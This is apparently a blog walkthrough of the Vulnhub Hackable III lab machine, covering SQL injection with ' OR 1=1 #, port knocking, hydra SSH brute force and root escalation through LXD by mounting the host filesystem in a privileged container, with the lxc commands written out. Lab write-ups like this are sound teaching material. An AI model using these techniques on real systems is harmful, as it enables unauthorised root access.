top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

Hackable III Walkthrough – Vulnhub



Name: Hackable: III

Date release: 2 Jun 2021

Author: Elias Sousa

Series: Hackable

Difficulty: Medium


Welcome Reader, Today we'll pwn Hackable III from vulnhub. Let's start with an Nmap scan.


Web Server

Let's start with directory fuzzing using gobuster.


Looking through the page source of the home page I found something interesting.


Here, we can discover a potential username. Moreover, we learn the necessity of unlocking a port via port knocking. Subsequently, a hint suggests the involvement of steganography. In such a scenario, our task is to uncover the numerical sequence that triggers port opening through binary knocked. Hence, let’s locate these files. Additionally, we should pay attention to the login.html file mentioned just before the comment. Accessing the provided link leads us to a login form.


Luckily, this form suffers from an SQL injection using payload ' OR 1=1 #. Although we see a blank page, the source contains the next hint.


Here, we observe a jpg file embedded in the header. Confirming its location, it indeed corresponds to a valid path. This undoubtedly aligns with the hint we encountered earlier. Consequently, I proceeded to download the file and performed steganography on it.


Steganography


Since we've uncovered one number, our task now is to locate the other two. To do this, I explored the /config directory and observed the gobuster result.


Here, we encounter another file containing base64-encoded text. Upon decoding it, we unveil yet another number.


Upon inspecting the /css path, we came across a file named 2.txt. This file contains text encoded in Brainfuck language. We can decode this using this tool here.


Upon decoding the text it reveals another port.


Now armed with the three numbers, we can proceed with the ritual of port knocking. Once the ports had been knocked in the correct sequence, I checked to see if the SSH port was open.


We already have a username from the page source of the home page and I also discovered a wordlist under /backup.


SSH Brute Force

It's time to use hydra.


The attack was successful and we got the password for the user jubiscleudo.


USER

ROOT

Looking through the files I found the password of the user hackable_3.


Checking the groups of hackable_3 revealed that he's the part of LXD group.

I initialized the LXC to create the storage pool.


Let's generate an LXC image.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

I moved the generated image over to the target's machine using the python3 server and imported the image.


lxc image import ./alpine-v3.19-x86_64-20240311_2154.tar.gz --alias malicious

After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the security.privileged flag and the root path for the container. This flag disables all isolation features that allow us to act on the host.



lxc init malicious privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Once we have done that, we can start the container and log into it. In the container, we can then go to the path we specified to access the resource of the host system as root.


Thanks for reading. If you have any questions please don't hesitate to ask.

18 views1 comment

Recent Posts

See All

1 commento


Beri Contraster
Beri Contraster
12 mar

This is actually good.

Mi piace
bottom of page